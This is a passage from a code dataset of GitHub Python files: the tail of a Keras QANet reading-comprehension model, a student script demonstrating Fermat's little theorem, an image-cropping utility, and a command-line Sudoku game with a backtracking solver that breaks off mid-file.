x])\n return x\n\nhighway1 = Highway(dim=128, layers=2)\nhighway2 = Highway(dim=128, layers=2)\n\n\nquest_emb = highway1(quest_emb)\ncand_emb = highway1(cand_emb)\n\nlstm_dim = 60\n\ndef GetPosEncodingMatrix(max_len, d_emb):\n pos_enc = np.array([\n [pos / np.power(10000, 2 * (j // 2) / d_emb) for j in range(d_emb)]\n if pos != 0 else np.zeros(d_emb)\n for pos in range(max_len)\n ])\n pos_enc[1:, 0::2] = np.sin(pos_enc[1:, 0::2]) # dim 2i\n pos_enc[1:, 1::2] = np.cos(pos_enc[1:, 1::2]) # dim 2i+1\n return pos_enc\n\nadd_layer = Lambda(lambda x:x[0]+x[1], output_shape=lambda x:x[0])\n\n\nclass AddPosEncoding:\n def __call__(self, x):\n _, max_len, d_emb = K.int_shape(x)\n pos = GetPosEncodingMatrix(max_len, d_emb)\n x = Lambda(lambda x: x + pos)(x)\n return x\n\n\nclass LayerNormalization(Layer):\n def __init__(self, eps=1e-6, **kwargs):\n self.eps = eps\n super().__init__(**kwargs)\n\n def build(self, input_shape):\n self.gamma = self.add_weight(name='gamma', shape=input_shape[-1:],\n initializer='ones', trainable=True)\n self.beta = self.add_weight(name='beta', shape=input_shape[-1:],\n initializer='zeros', trainable=True)\n super().build(input_shape)\n\n def call(self, x):\n mean = K.mean(x, axis=-1, keepdims=True)\n std = K.std(x, axis=-1, keepdims=True)\n return self.gamma * (x - mean) / (std + self.eps) + self.beta\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ScaledDotProductAttention():\n def __init__(self, d_model, attn_dropout=0.1):\n self.temper = np.sqrt(d_model)\n self.dropout = Dropout(attn_dropout)\n\n def __call__(self, q, k, v, mask):\n attn = Lambda(lambda x: K.batch_dot(x[0], x[1], axes=[2, 2]) / self.temper)([q, k])\n if mask is not None:\n mmask = Lambda(lambda x: (-1e+10) * (1 - x))(mask)\n attn = Add()([attn, mmask])\n attn = Activation('softmax')(attn)\n attn = self.dropout(attn)\n output = Lambda(lambda x: K.batch_dot(x[0], x[1]))([attn, v])\n return output, attn\n\n\nclass MultiHeadAttention():\n # mode 0 - big martixes, faster; mode 1 - more clear implementation\n def __init__(self, n_head, d_model, d_k, d_v, dropout, mode=0, use_norm=True):\n self.mode = mode\n self.n_head = n_head\n self.d_k = d_k\n self.d_v = d_v\n self.dropout = dropout\n if mode == 0:\n 
self.qs_layer = Dense(n_head * d_k, use_bias=False)\n self.ks_layer = Dense(n_head * d_k, use_bias=False)\n self.vs_layer = Dense(n_head * d_v, use_bias=False)\n elif mode == 1:\n self.qs_layers = []\n self.ks_layers = []\n self.vs_layers = []\n for _ in range(n_head):\n self.qs_layers.append(TimeDistributed(Dense(d_k, use_bias=False)))\n self.ks_layers.append(TimeDistributed(Dense(d_k, use_bias=False)))\n self.vs_layers.append(TimeDistributed(Dense(d_v, use_bias=False)))\n self.attention = ScaledDotProductAttention(d_model)\n self.layer_norm = LayerNormalization() if use_norm else None\n self.w_o = TimeDistributed(Dense(d_model))\n\n def __call__(self, q, k, v, mask=None):\n d_k, d_v = self.d_k, self.d_v\n n_head = self.n_head\n\n if self.mode == 0:\n qs = self.qs_layer(q) # [batch_size, len_q, n_head*d_k]\n ks = self.ks_layer(k)\n vs = self.vs_layer(v)\n\n def reshape1(x):\n s = tf.shape(x) # [batch_size, len_q, n_head * d_k]\n x = tf.reshape(x, [s[0], s[1], n_head, d_k])\n x = tf.transpose(x, [2, 0, 1, 3])\n x = tf.reshape(x, [-1, s[1], d_k]) # [n_head * batch_size, len_q, d_k]\n return x\n\n qs = Lambda(reshape1)(qs)\n ks = Lambda(reshape1)(ks)\n vs = Lambda(reshape1)(vs)\n\n if mask is not None:\n mask = Lambda(lambda x: K.repeat_elements(x, n_head, 0))(mask)\n head, attn = self.attention(qs, ks, vs, mask=mask)\n\n def reshape2(x):\n s = tf.shape(x) # [n_head * batch_size, len_v, d_v]\n x = tf.reshape(x, [n_head, -1, s[1], s[2]])\n x = tf.transpose(x, [1, 2, 0, 3])\n x = tf.reshape(x, [-1, s[1], n_head * d_v]) # [batch_size, len_v, n_head * d_v]\n return x\n\n head = Lambda(reshape2)(head)\n elif self.mode == 1:\n heads = [];\n attns = []\n for i in range(n_head):\n qs = self.qs_layers[i](q)\n ks = self.ks_layers[i](k)\n vs = self.vs_layers[i](v)\n head, attn = self.attention(qs, ks, vs, mask)\n heads.append(head);\n attns.append(attn)\n head = Concatenate()(heads)\n attn = Concatenate()(attns)\n\n outputs = self.w_o(head)\n outputs = Dropout(self.dropout)(outputs)\n if not self.layer_norm: return outputs, attn\n outputs = Add()([outputs, q])\n return self.layer_norm(outputs), attn\n\n\nclass PositionwiseFeedForward():\n def __init__(self, d_hid, d_inner_hid, dropout=0.1):\n self.w_1 = Conv1D(d_inner_hid, 1, activation='relu')\n self.w_2 = Conv1D(d_hid, 1)\n self.layer_norm = LayerNormalization()\n self.dropout = Dropout(dropout)\n\n def __call__(self, x):\n output = self.w_1(x)\n output = self.w_2(output)\n output = self.dropout(output)\n output = Add()([output, x])\n return self.layer_norm(output)\n\n\nclass FeedForward():\n def __init__(self, d_hid, dropout=0.1):\n self.forward = Dense(d_hid, activation='relu')\n self.dropout = Dropout(dropout)\n\n def __call__(self, x):\n x = self.forward(x)\n x = self.dropout(x)\n return x\n\n\nclass LayerDropout:\n def __init__(self, dropout=0.2):\n self.dropout = dropout\n\n def __call__(self, old, new):\n def func(args):\n old, new = args\n pred = K.random_uniform([]) < self.dropout\n ret = K.switch(pred, old, old + K.dropout(new, self.dropout))\n return K.in_train_phase(ret, old + new)\n\n return Lambda(func)([old, new])\n\n\nclass ConvBlock:\n def __init__(self, dim, n_conv=2, kernel_size=7, dropout=0.1):\n self.convs = [SeparableConv1D(dim, kernel_size, activation='relu', padding='same') for _ in range(n_conv)]\n self.norm = LayerNormalization()\n self.dropout = Dropout(dropout)\n\n def __call__(self, x):\n for i in range(len(self.convs)):\n z = self.norm(x)\n if i % 2 == 0: z = self.dropout(z)\n z = self.convs[i](z)\n x = add_layer([x, 
z])\n return x\n\n\nclass EncoderBlock:\n def __init__(self, dim, n_head, n_conv, kernel_size):\n self.conv = ConvBlock(dim, n_conv=n_conv, kernel_size=kernel_size)\n self.self_att = MultiHeadAttention(n_head=n_head, d_model=dim,\n d_k=dim // n_head, d_v=dim // n_head,\n dropout=0.1, use_norm=False)\n self.feed_forward = PositionwiseFeedForward(dim, dim, dropout=0.1)\n self.norm = LayerNormalization()\n\n def __call__(self, x, mask):\n x = AddPosEncoding()(x)\n x = self.conv(x)\n z = self.norm(x)\n z, _ = self.self_att(z, z, z, mask)\n x = add_layer([x, z])\n z = self.norm(x)\n z = self.feed_forward(z)\n x = add_layer([x, z])\n return x\n\n\nclass Encoder:\n def __init__(self, dim=128, n_head=8, n_conv=2, n_block=1, kernel_size=7):\n self.dim = dim\n self.n_block = n_block\n self.conv_first = SeparableConv1D(dim, 1, padding='same')\n self.enc_block = EncoderBlock(dim, n_head=n_head, n_conv=n_conv, kernel_size=kernel_size)\n\n def __call__(self, x, mask):\n if K.int_shape(x)[-1] != self.dim:\n x = self.conv_first(x)\n for i in range(self.n_block):\n x = self.enc_block(x, mask)\n return x\n\nemb_enc1 = Encoder(128, n_head=2, n_conv=4, n_block=1, kernel_size=7)\nemb_enc2 = Encoder(128, n_head=2, n_conv=4, n_block=1, kernel_size=7)\nmain_enc1 = Encoder(128, n_head=2, n_conv=2, n_block=2, kernel_size=5)\nmain_enc2 = Encoder(128, n_head=2, n_conv=2, n_block=2, kernel_size=5)\nmain_enc3 = Encoder(128, n_head=2, n_conv=2, n_block=2, kernel_size=5)\n\nQmask = Lambda(lambda x:K.cast(K.not_equal(x,0), 'float32'))(quest_input)\nCmask = Lambda(lambda x:K.cast(K.not_equal(x,0), 'float32'))(cand_input)\n\nQ = emb_enc1(quest_emb, Qmask)\nC = emb_enc1(cand_emb, Cmask)\n\nQsmask = Lambda(lambda x:(1-x)*(-1e+9))(Qmask)\nCsmask = Lambda(lambda x:(1-x)*(-1e+9))(Cmask)\n\nCC = Lambda(lambda C:K.repeat_elements(C[:,:,None,:], setting.query_len, 2))(C)\nQQ = Lambda(lambda Q:K.repeat_elements(Q[:,None,:,:], setting.passage_len, 1))(Q)\nS_hat = concatenate([CC, QQ, multiply([CC, QQ])])\nS = Reshape((setting.passage_len, setting.query_len))( TimeDistributed(TimeDistributed(Dense(1, use_bias=False)))(S_hat) )\n\naa = Activation('softmax')( add([S, Qsmask]) )\nU_hat = Lambda(lambda x:K.batch_dot(x[0], x[1]))([aa, Q])\n\nSS = Lambda(lambda x: K.max(x, 2))(S)\nbb = Activation('softmax')( add([SS, Csmask]) )\nh_hat = Lambda( lambda x: K.batch_dot(K.expand_dims(x[0],1), x[1]) )([bb, C])\nH_hat = Lambda( lambda x: K.repeat_elements(x, setting.passage_len, 1) )(h_hat)\n\n\nG = concatenate([C, U_hat, multiply([C,U_hat]), multiply([C,H_hat])])\n\nG0 = main_enc1(G, Cmask)\nM1 = main_enc2(G0, Cmask)\nM2 = main_enc3(M1, Cmask)\n\nGM1 = concatenate([G0, M1])\nGM2 = concatenate([G0, M2])\n\nF1 = TimeDistributed(Dense(1, use_bias=False))(GM1)\nF2 = TimeDistributed(Dense(1, use_bias=False))(GM2)\n\nfinal_start = Activation('sigmoid', name='s')(Flatten()( F1 ))\nfinal_end = Activation('sigmoid', name='e')(Flatten()( F2 ))\n\nmodel = Model(inputs=[questC_input, quest_input, candC_input, cand_input, questAc_input, questA_input, candAc_input, candA_input], outputs=[final_start, final_end])\nmodel.summary()\n\n\nif __name__ == '__main__':\n name = 'qanet'\n training(name, model)\n","repo_name":"kyang888/sg_transfer_s","sub_path":"model_qanet.py","file_name":"model_qanet.py","file_ext":"py","file_size_in_byte":13304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36272429575","text":"# harrison frahn\n# period 2\n# chapter 8.3\n# expected input: a prime and an integer\ndef 
isprime(num):\n    if num%1!=0:\n        return False\n    num = abs(num)\n    # 1 and 0 aren't prime\n    if num < 2:\n        return False\n    # 2 is the only even prime\n    if num == 2: \n        return True\n    # after we're sure n isn't 2, return false if n is even\n    if num%2==0: \n        return False\n    # check all the rest of the nums up to sqrt(n)\n    for i in range(3, int(num**0.5)+1, 2):\n        if num % i == 0:\n            return False\n    return True\ndef main():\n    again = True\n    try:\n        while again:\n            print('This program demonstrates Fermat\\'s little theorem.')\n            p = eval(input(\"Enter a prime: \"))\n            a = eval(input(\"enter an integer: \"))\n            if isprime(p) and a%1==0:\n                mult = a**p\n                fact = (mult - a)//p\n                print('a =',a,'\\np =',p)\n                print(a,'^',p,'=',int(mult))\n                print('(',int(mult),'-',a,') /',p,'=',int(fact))\n                print(mult-a,'is an integer multiple of',p,'so the theorem works! YAY!')\n            elif isprime(p)==False and a%1!=0:\n                raise RuntimeError(\"You didn't enter a prime number or an integer!\")\n            elif isprime(p)==False:\n                raise RuntimeError(\"You didn't enter a prime number!\")\n            elif a%1!=0:\n                raise RuntimeError(\"You didn't enter an integer!\")\n            a = input('Demonstrate the theorem again, with different values?(y/n)')\n            # validate the answer before acting on it\n            if a[0].lower() != 'y' and a[0].lower() != 'n':\n                raise RuntimeError(\"You didn't enter y or n!\")\n            if a[0].lower() != 'y':\n                again = False\n    except RuntimeError as err:\n        print(err.args)\n    except NameError:\n        print(\"You entered letter(s), not a number!\")\n    except TypeError:\n        print(\"You entered more than 1 number!\")\n    except SyntaxError:\n        print(\"You entered the number wrong!\")\n    except (EOFError, KeyboardInterrupt):\n        # 'except A or B' only ever caught A; a tuple catches both\n        print('\\n')\n    except:\n        print(\"Something went wrong!\")\nmain()\n","repo_name":"hrfrahn/functprog","sub_path":"Chapter 8 programming projects/ch8_3.py","file_name":"ch8_3.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"27646968836","text":"from PIL import Image\nimport numpy as np\nimport os\n\nbase_dir='./data'\n\nclass ImageCropper():\n\tdef __init__(self, out_dir):\n\t\tself.out_dir = out_dir\n\n\tdef start_Cropping(self):\n\t\tbase_path = os.path.join(base_dir,'CCWeb','data')\n\t\tout_path = os.path.join(self.out_dir,'CCWeb','data','image')\n\n\t\tbase_path_labels = os.path.join(base_path, 'label')\n\t\tbase_path_images = os.path.join(base_path, 'image')\n\n\t\tfor folder in os.listdir(base_path_labels):\n\t\t\tfor folder2 in os.listdir(os.path.join(base_path_labels, folder)):\n\t\t\t\tfor folder3 in os.listdir(os.path.join(base_path_labels, folder, folder2)):\n\t\t\t\t\tfor label_file in os.listdir(os.path.join(base_path_labels, folder, folder2, folder3)):\n\t\t\t\t\t\tfile_name = label_file.split('.')[0]\n\n\t\t\t\t\t\timg_file = os.path.join(base_path_images, folder, folder2, folder3)+'/'+file_name+'.jpg'\n\t\t\t\t\t\tprint('FileName', img_file)\n\t\t\t\t\t\timg = Image.open(img_file)\n\t\t\t\t\t\t\n\t\t\t\t\t\tos.makedirs(os.path.join(out_path, folder, folder2, folder3), exist_ok=True)\n\n\t\t\t\t\t\twith open(os.path.join(base_path_labels, folder, folder2, folder3)+'/'+label_file) as f:\n\t\t\t\t\t\t\tcnt = 0\n\t\t\t\t\t\t\tfor line in f:\n\t\t\t\t\t\t\t\tcnt += 1\n\t\t\t\t\t\t\t\tif (cnt == 3):\n\t\t\t\t\t\t\t\t\tx1,y1,x2,y2 = line.split(' ')\n\t\t\t\t\t\t\t\t\tx1 = int(x1)\n\t\t\t\t\t\t\t\t\ty1 = int(y1)\n\t\t\t\t\t\t\t\t\tx2 = int(x2)\n\t\t\t\t\t\t\t\t\ty2 = int(y2)\n\t\t\t\t\t\t\t\t\timg1 = img\n\n\t\t\t\t\t\t\t\t\tx_max, y_max = img.size\n\n\t\t\t\t\t\t\t\t\tif (x1 > 0 and x2 > 0 
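# An illustrative sanity check (values invented, not from the dataset): on a\n\t\t\t\t\t\t\t\t\t# 640x480 scan, a label box (x1, y1, x2, y2) = (12, 30, 610, 450) passes every\n\t\t\t\t\t\t\t\t\t# clause below; PIL's Image.crop((left, upper, right, lower)) then yields the\n\t\t\t\t\t\t\t\t\t# 598x420 sub-image.\n\t\t\t\t\t\t\t\t\t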
and y1 > 0 and y2 > 0 and x1 < x_max and x2 < x_max and y1 < y_max and y2 < y_max and x1 != x2 and y1 != y2):\n\t\t\t\t\t\t\t\t\t\timg1 = img.crop((x1, y1, x2, y2))\n\t\t\t\t\t\t\t\t\timg1.save(os.path.join(out_path, folder, folder2, folder3)+'/'+file_name+'.jpg')\n\n\ndef main():\n\ta = ImageCropper('./data_cropped')\n\ta.start_Cropping()\n\nif __name__ == '__main__':\n main()","repo_name":"NiteshBharadwaj/latent_domain_alignment_domain_adaptation","sub_path":"image_cropper.py","file_name":"image_cropper.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41236967190","text":"from termcolor import colored\n\n\nclass SudokuBoard:\n \"\"\"\n This class contains the board object, with methods pertaining to the board. This\n class contains methods to check win conditions, the brute force solver, and the main\n command line driver code.\n \"\"\"\n\n def __init__(self, difficulty):\n \"\"\"\n Sets the board based on chosen difficulty level or mode chosen.\n :param difficulty: The difficulty or mode chosen options: Easy, Medium, Hard, Verify, Brute Force\n \"\"\"\n self.difficulty = difficulty\n self.game_won = False\n if self.difficulty == \"Easy\":\n\n self.board_print = [\n [0, colored(8, 'blue'), 0, 0, colored(1, 'blue'), colored(3, 'blue'), colored(4, 'blue'), 0, 0],\n [colored(4, 'blue'), colored(2, \"blue\"), 0, colored(6, 'blue'), colored(8, \"blue\"), 0, 0, 0, 0],\n [0, 0, colored(1, \"blue\"), 0, colored(5, \"blue\"), colored(4, 'blue'), 0, colored(8, 'blue'),\n colored(3, \"blue\")],\n [colored(1, 'blue'), colored(9, 'blue'), 0, 0, 0, colored(8, \"blue\"), colored(7, \"blue\"), 0, 0],\n [0, colored(4, 'blue'), colored(7, 'blue'), 0, 0, colored(2, 'blue'), colored(5, 'blue'), 0,\n colored(8, 'blue')],\n [0, colored(5, \"blue\"), 0, 0, 0, colored(9, \"blue\"), 0, colored(3, \"blue\"), 0],\n [colored(2, \"blue\"), 0, colored(9, \"blue\"), colored(3, \"blue\"), 0, colored(5, \"blue\"), 0,\n colored(7, \"blue\"), 0],\n [colored(5, \"blue\"), 0, 0, colored(7, \"blue\"), colored(2, \"blue\"), 0, 0, 0, colored(9, \"blue\")],\n [colored(7, \"blue\"), colored(3, \"blue\"), 0, 0, 0, 0, colored(2, \"blue\"), 0, colored(6, \"blue\")]]\n\n self.board = [\n [0, 8, 0, 0, 1, 3, 4, 0, 0],\n [4, 2, 0, 6, 8, 0, 0, 0, 0],\n [0, 0, 1, 0, 5, 4, 0, 8, 3],\n [1, 9, 0, 0, 0, 8, 7, 0, 0],\n [0, 4, 7, 0, 0, 2, 5, 0, 8],\n [0, 5, 0, 0, 0, 9, 0, 3, 0],\n [2, 0, 9, 3, 0, 5, 0, 7, 0],\n [5, 0, 0, 7, 2, 0, 0, 0, 9],\n [7, 3, 0, 0, 0, 0, 2, 0, 6]]\n\n self.banned_moves = [(0, 1), (0, 4), (0, 5), (0, 6),\n (1, 0), (1, 1), (1, 3), (1, 4),\n (2, 2), (2, 4), (2, 5), (2, 7), (2, 8),\n (3, 0), (3, 1), (3, 5), (3, 6),\n (4, 1), (4, 2), (4, 5), (4, 6), (4, 8),\n (5, 1), (5, 5), (5, 7),\n (6, 0), (6, 2), (6, 3), (6, 5), (6, 7),\n (7, 0), (7, 3), (7, 4), (7, 8),\n (8, 0), (8, 1), (8, 6), (8, 8)]\n\n self.play_game()\n\n elif self.difficulty == \"Medium\":\n\n self.board = [\n [7, 0, 0, 8, 0, 9, 0, 0, 6],\n [0, 0, 1, 7, 0, 0, 0, 0, 9],\n [2, 0, 0, 0, 5, 0, 0, 0, 1],\n [9, 0, 0, 0, 0, 0, 0, 0, 0],\n [6, 5, 0, 0, 0, 0, 4, 2, 0],\n [4, 3, 0, 0, 7, 8, 0, 0, 0],\n [8, 6, 0, 0, 9, 0, 1, 0, 2],\n [3, 0, 4, 0, 0, 6, 0, 0, 0],\n [1, 0, 0, 0, 8, 0, 0, 6, 0]]\n\n self.board_print = [\n [colored(7, 'blue'), 0, 0, colored(8, \"blue\"), 0, colored(9, \"blue\"), 0, 0, colored(6, \"blue\")],\n [0, 0, colored(1, \"blue\"), colored(7, \"blue\"), 0, 0, 0, 0, colored(9, 'blue')],\n [colored(2, \"blue\"), 0, 0, 0, colored(5, \"blue\"), 0, 0, 0, 
colored(1, \"blue\")],\n [colored(9, \"blue\"), 0, 0, 0, 0, 0, 0, 0, 0],\n [colored(6, \"blue\"), colored(5, \"blue\"), 0, 0, 0, 0, colored(4, \"blue\"), colored(2, \"blue\"), 0],\n [colored(4, \"blue\"), colored(3, \"blue\"), 0, 0, colored(7, \"blue\"), colored(8, \"blue\"), 0, 0, 0],\n [colored(8, \"blue\"), colored(6, \"blue\"), 0, 0, colored(9, \"blue\"), 0, colored(1, \"blue\"), 0,\n colored(2, \"blue\")],\n [colored(3, \"blue\"), 0, colored(4, \"blue\"), 0, 0, colored(6, \"blue\"), 0, 0, 0],\n [colored(1, \"blue\"), 0, 0, 0, colored(8, \"blue\"), 0, 0, colored(6, \"blue\"), 0]]\n\n self.banned_moves = [\n (0, 0), (0, 5), (0, 8),\n (1, 2), (1, 3), (1, 8),\n (2, 0), (2, 4), (1, 8),\n (3, 0),\n (4, 0), (4, 1), (4, 6), (4, 7),\n (5, 0), (5, 1), (5, 4), (5, 5),\n (6, 0), (6, 1), (6, 4), (6, 6), (6, 8),\n (7, 0), (7, 2), (7, 5),\n (8, 0), (8, 4), (8, 7)]\n\n self.play_game()\n\n elif self.difficulty == \"Hard\":\n\n self.board = [\n [0, 9, 0, 7, 0, 1, 0, 0, 0],\n [0, 0, 0, 4, 0, 0, 0, 0, 0],\n [7, 0, 0, 0, 0, 6, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0, 4],\n [0, 0, 0, 0, 9, 5, 0, 0, 7],\n [6, 0, 8, 0, 4, 0, 0, 9, 0],\n [8, 0, 0, 3, 0, 0, 7, 0, 0],\n [0, 0, 4, 0, 5, 0, 0, 0, 2],\n [0, 2, 9, 0, 0, 0, 0, 5, 8]]\n\n self.board_print = [\n [0, colored(9, \"blue\"), 0, colored(7, \"blue\"), 0, colored(1, \"blue\"), 0, 0, 0],\n [0, 0, 0, colored(4, \"blue\"), 0, 0, 0, 0, 0],\n [colored(7, \"blue\"), 0, 0, 0, 0, colored(6, \"blue\"), 0, 0, 0],\n [0, colored(1, \"blue\"), 0, 0, 0, 0, 0, 0, colored(4, \"blue\")],\n [0, 0, 0, 0, colored(9, \"blue\"), colored(5, \"blue\"), 0, 0, colored(7, \"blue\")],\n [colored(6, \"blue\"), 0, colored(8, \"blue\"), 0, colored(4, \"blue\"), 0, 0, colored(9, \"blue\"), 0],\n [colored(8, \"blue\"), 0, 0, colored(3, \"blue\"), 0, 0, colored(7, \"blue\"), 0, 0],\n [0, 0, colored(4, \"blue\"), 0, colored(5, \"blue\"), 0, 0, 0, colored(2, \"blue\")],\n [0, colored(2, \"blue\"), colored(9, \"blue\"), 0, 0, 0, 0, colored(5, \"blue\"), colored(8, \"blue\")]]\n\n self.banned_moves = [\n (0, 1), (0, 3), (0, 5),\n (1, 3),\n (2, 0), (2, 5),\n (3, 1), (3, 8),\n (4, 4), (4, 5), (4, 8),\n (5, 0), (5, 2), (5, 4), (5, 7),\n (6, 0), (6, 3), (6, 6),\n (7, 2), (7, 4), (7, 8),\n (8, 1), (8, 2), (8, 7), (8, 8)]\n\n self.play_game()\n elif self.difficulty == \"Brute Force\":\n\n self.board = [\n [0, 8, 0, 0, 1, 3, 4, 0, 0],\n [4, 2, 0, 6, 8, 0, 0, 0, 0],\n [0, 0, 1, 0, 5, 4, 0, 8, 3],\n [1, 9, 0, 0, 0, 8, 7, 0, 0],\n [0, 4, 7, 0, 0, 2, 5, 0, 8],\n [0, 5, 0, 0, 0, 9, 0, 3, 0],\n [2, 0, 9, 3, 0, 5, 0, 7, 0],\n [5, 0, 0, 7, 2, 0, 0, 0, 9],\n [7, 3, 0, 0, 0, 0, 2, 0, 6]]\n\n self.board_print = self.board\n\n self.banned_moves = [(0, 1), (0, 4), (0, 5), (0, 6),\n (1, 0), (1, 1), (1, 3), (1, 4),\n (2, 2), (2, 4), (2, 5), (2, 7), (2, 8),\n (3, 0), (3, 1), (3, 5), (3, 6),\n (4, 1), (4, 2), (4, 5), (4, 6), (4, 8),\n (5, 1), (5, 5), (5, 7),\n (6, 0), (6, 2), (6, 3), (6, 5), (6, 7),\n (7, 0), (7, 3), (7, 4), (7, 8),\n (8, 0), (8, 1), (8, 6), (8, 8)]\n\n game_obj = SudokuGame(self)\n self.brute_force_method(game_obj)\n self.print_board()\n\n elif self.difficulty == \"Verify\":\n n = 81\n\n # citation: https://pynative.com/python-accept-list-input-from-user/#h-input-a-list-using-input-and-range-function\n num_list = list(int(num) for num in input(\"Enter a Sudoku Board \").strip().split())[:n]\n\n if len(num_list) < 81:\n print(\"No, this is not a valid solution.\")\n else:\n # citation: https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks\n self.board = [num_list[x:x 
+ 9] for x in range(0, len(num_list), 9)]\n self.board_print = self.board\n self.print_board()\n\n print(self.check_win())\n\n def play_game(self):\n \"\"\"\n Main driver code for the command line game. The function contains all of the\n commands that are asked of the player until the game is won.\n :return:\n \"\"\"\n self.game_won = False\n temp = self\n print(\"Ok, here's your board.\")\n temp.print_board()\n print(\"Fill in the blanks to win the game\")\n print(\"Pass an argument by entering row, column, and value\")\n\n game_obj = SudokuGame(self.board)\n\n while self.game_won is False:\n while True:\n try:\n row = int(input(\"What row? \"))\n col = int(input(\"what column? \"))\n value = int(input(\"What value? \"))\n game_obj.add_value(row, col, value, self)\n print(self.puzzle_complete())\n print(self.check_win())\n temp.print_board()\n except:\n print(\"Those were not valid inputs\")\n else:\n break\n\n def get_squares(self, row, col):\n \"\"\"\n Returns the subgrid a passed cell belongs to. Used to check whether the intended\n value is already present in the subgrid.\n :param row: Row of the cell to be changed\n :param col: Column of the cell to be changed\n :return: Tuple\n \"\"\"\n if row <= 2:\n if col <= 2:\n return (0, 2), (0, 2)\n elif col <= 5:\n return (0, 2), (3, 5)\n else:\n return (0, 2), (6, 8)\n elif row <= 5:\n if col <= 2:\n return (3, 5), (0, 2)\n elif col <= 5:\n return (3, 5), (3, 5)\n else:\n return (3, 5), (6, 8)\n else:\n if col <= 2:\n return (6, 8), (0, 2)\n elif col <= 5:\n return (6, 8), (3, 5)\n else:\n return (6, 8), (6, 8)\n\n def is_move_legal(self, game_obj, row, col, value):\n \"\"\"\n Calls several functions to determine whether a potential move is legal\n :param game_obj: SudokuGame object\n :param row: row to be altered\n :param col: column to be altered\n :param value: value to insert in [row][column]\n :return: True False\n \"\"\"\n if game_obj.check_row(row, value, self) is True:\n if game_obj.check_col(col, value, self) is True:\n square = self.get_squares(row, col)\n if game_obj.check_square(square, value, self) is True:\n return True\n return False\n\n def empties(self):\n \"\"\"\n Helper Function for Brute_Force_Method. When the board has been filled this function signals the end of\n the recursive calls.\n :return: List of tuples\n \"\"\"\n empties = []\n for i in range(9):\n for x in range(9):\n if self.board[i][x] == 0:\n empties.append((i, x))\n return empties\n\n def brute_force_method(self, game_obj):\n \"\"\"\n This function builds a solution to the sudoku board using backtracking method.\n :param game_obj: SudokuGame object\n :return: None\n \"\"\"\n for i in range(9):\n for x in range(9):\n if self.board[i][x] == 0:\n for num in range(1, 10):\n if self.is_move_legal(game_obj, i, x, num) is True:\n self.board[i][x] = num\n result = self.brute_force_method(game_obj)\n empties = self.empties()\n if len(empties) == 0:\n break\n else:\n self.board[i][x] = 0\n return False\n return True\n\n def print_board(self):\n \"\"\"\n This function prints the board through the game. 
Formatting citation provided below.\n        :return: printed board representation.\n        \"\"\"\n        # citation: https://stackoverflow.com/questions/37952851/formating-sudoku-grids-python-3\n        row_num = 0\n        print(\"|\" + \"---+\" * 8 + \"---|\")\n        for i in self.board_print:\n            print((\"|\" + \" {} {} {} |\" * 3).format(*[x if x != 0 else \" \" for x in i]))\n            if row_num == 8:\n                print(\"|\" + \"---+\" * 8 + \"---|\")\n            elif row_num % 3 == 2:\n                print(\"|\" + \"---+\" * 8 + \"---|\")\n            else:\n                print(\"|\" + \"   +\" * 8 + \"   |\")\n            row_num += 1\n\n    def update_board(self, row, col, val):\n        \"\"\"\n        When the SudokuGame class determines that a potential move is legal this function updates\n        the game board and the human-readable printed board.\n        :param row: The row to be updated\n        :param col: Column to be updated\n        :param val: The value to be inserted at the [row][column] position\n        :return: None\n        \"\"\"\n\n        self.board[row][col] = val\n        self.board_print[row][col] = val\n\n    def get_board_value(self, row, col):\n        \"\"\"\n        Returns the value at a given [row][column] location.\n        :param row: The row to be checked.\n        :param col: The column to be checked.\n        :return: Value at [row][column] location.\n        \"\"\"\n        return self.board[row][col]\n\n    def puzzle_complete(self):\n        \"\"\"\n        This function determines whether the sudoku grid has been filled and if so runs\n        a check for win conditions.\n        :return: String or calls check_win()\n        \"\"\"\n        check_val = 0\n        for i in self.board:\n            if check_val in i:\n                return \"Ready for next guess\"\n\n        return self.check_win()\n\n    def check_win(self):\n        \"\"\"\n        Checks whether a filled board represents a valid solution.\n        :return: String\n        \"\"\"\n        # check that the board is completely filled\n        for i in self.board:\n            row = i\n            for x in row:\n                if x == 0:\n                    return\n\n        # check if no values are repeated in any row\n        for i in self.board:\n            used_nums = []\n            row = i\n            for num in row:\n                if num not in used_nums:\n                    used_nums.append(num)\n                elif num in used_nums:\n                    return \"This is not a valid solution\"\n\n        # check for no repeated nums in cols\n        cols = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n        for col in cols:\n            used_nums = []\n            for x in range(9):\n                # index as [row][col]; the old [col][x] re-checked rows instead of columns\n                temp_val = self.board[x][col]\n                if temp_val not in used_nums:\n                    used_nums.append(temp_val)\n                elif temp_val in used_nums:\n                    return \"This is not a valid solution\"\n\n        # check for repeated nums in each 3x3 sub-grid\n        # (the old sub1..sub9 slicing compared whole rows, not numbers, so duplicates slipped through)\n        for box_row in (0, 3, 6):\n            for box_col in (0, 3, 6):\n                used_nums = []\n                for i in range(box_row, box_row + 3):\n                    for j in range(box_col, box_col + 3):\n                        temp_val = self.board[i][j]\n                        if temp_val not in used_nums:\n                            used_nums.append(temp_val)\n                        else:\n                            return \"This is not a valid solution\"\n\n        self.game_won = True\n        print(\"You've won the game!\")\n\n\n\n\nclass SudokuGame:\n    \"\"\"\n    This class contains all the logic to actually play the sudoku game.\n    \"\"\"\n\n    def __init__(self, board):\n        \"\"\"\n        Takes as argument a SudokuBoard object.\n        :param board:\n        \"\"\"\n        self.board = board\n\n    def input_validations(self, row, col, value, board_obj):\n        \"\"\"\n        This function validates that the passed row, col, and value are valid\n        :param row: The row to be checked\n        :param col: The column to be checked\n        :param value: The value to be checked\n        :param board_obj: The SudokuBoard object.\n        :return: True or False\n        \"\"\"\n\n        # rows and columns are 0-indexed, so 8 is the highest legal index\n        if value <= 9 and row <= 8 and col <= 8:\n            temp_tup = (row, col)\n            if temp_tup not in board_obj.banned_moves:\n                return True\n            else:\n                return False\n        else:\n            return False\n\n    def add_value(self, row, col, value, board_obj):\n        \"\"\"\n        This function updates the SudokuBoard with the valid move.\n        :param row: The row to be updated\n        :param col: The col to be updated\n        :param value: The value to be inserted at 